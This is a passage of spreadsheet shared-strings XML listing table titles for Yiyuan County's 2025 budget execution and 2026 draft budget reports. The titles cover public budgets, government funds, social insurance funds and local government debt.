  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>2</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县一般公共预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>3</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年山东省对沂源县一般性转移支付及税收返还情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>4</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年山东省对沂源县专项转移支付情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>5</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年淄博市对沂源县一般性转移支付及税收返还情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>6</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年淄博市对沂源县专项转移支付情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>7</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县政府性基金预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>8</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县政府性基金预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>9</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县国有资本经营预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>10</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县国有资本经营预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>11</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县社会保险基金预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>12</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县社会保险基金预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>13</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年末沂源县社会保险基金预算结余执行情况表</t>
  </si>
  <si>
    <t>第二部分    2025年县级预算执行情况</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>14</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级一般公共预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>15</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级一般公共预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>16</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县对下一般公共预算安排的税收返还及转移支付分项目执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>17</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级政府性基金预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>18</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级政府性基金预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>19</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县对下政府性基金转移支付分项目分地区执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>20</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级国有资本经营预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>21</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级国有资本经营预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>22</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县对下国有资本经营预算转移支付分项目分地区执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>23</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级社会保险基金预算收入执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>24</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县县级社会保险基金预算支出执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>25</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年末沂源县县级社会保险基金预算结余执行情况表</t>
  </si>
  <si>
    <t>第三部分    2026年全县预算草案</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>26</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县一般公共预算收入草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>27</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县一般公共预算支出草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>28</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县政府性基金预算收入草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>29</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县政府性基金预算支出草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>30</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县国有资本经营预算收入草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>31</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县国有资本经营预算支出草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>32</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县社会保险基金预算收入草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>33</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县社会保险基金预算支出草案表（代编）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>34</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年末沂源县社会保险基金预算结余预算表（代编）</t>
  </si>
  <si>
    <t>第四部分    2026年县级预算草案</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>35</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级一般公共预算收入草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>36</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级一般公共预算支出草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>37</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级一般公共预算支出草案表（功能分类）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>38</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 2026</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>年沂源县县级一般公共预算支出草案表（经济分类）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>39</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源一般公共预算安排的税收返还及一般性转移支付分项目草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>40</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源一般公共预算安排的专项转移支付分项目预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>41</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县对下一般公共预算安排的税收返还及转移支付分地区预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>42</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县对下一般公共预算安排的税收返还及转移支付分项目预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>43</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级政府性基金预算收入草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>44</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级政府性基金预算支出草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>45</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县对下政府性基金转移支付分项目预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>46</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县对下政府性基金转移支付分地区预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>47</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级国有资本经营预算收入草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>48</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级国有资本经营预算支出草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>49</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县对下国有资本经营预算转移支付分项目分地区预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>50</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级社会保险基金预算收入草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>51</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级社会保险基金预算支出草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>52</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年末沂源县县级社会保险基金预算结余预算表</t>
  </si>
  <si>
    <t>第五部分   地方政府性债务情况</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>53</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县地方政府债务限额余额情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>54</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县地方政府一般债务余额情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>55</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县地方政府一般债务限额余额情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>56</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县地方政府专项债务余额情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>57</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县地方政府专项债务限额余额情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>58</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县地方政府债券发行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>59</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>沂源县</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府债券分年偿还计划情况表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>60</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县新增债券和政府外贷额度安排情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>61</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县新增债券和政府外贷项目用途情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>62</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县政府债券发行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>63</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>沂源县</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府债券发行及还本付息情况表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>64</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县政府债务收支计划表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>65</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县县级政府债务收支计划表</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>第六部分</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他报表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>66</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县财政专户管理资金收支执行情况表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>67</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年沂源县财政专户管理资金收支计划预算表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>68</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年街道办事处一般公共预算收入预算草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>69</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2026年街道办事处一般公共预算支出预算草案表</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>第七部分</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>相关情况说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>1</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县一般公共预算收支情况说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
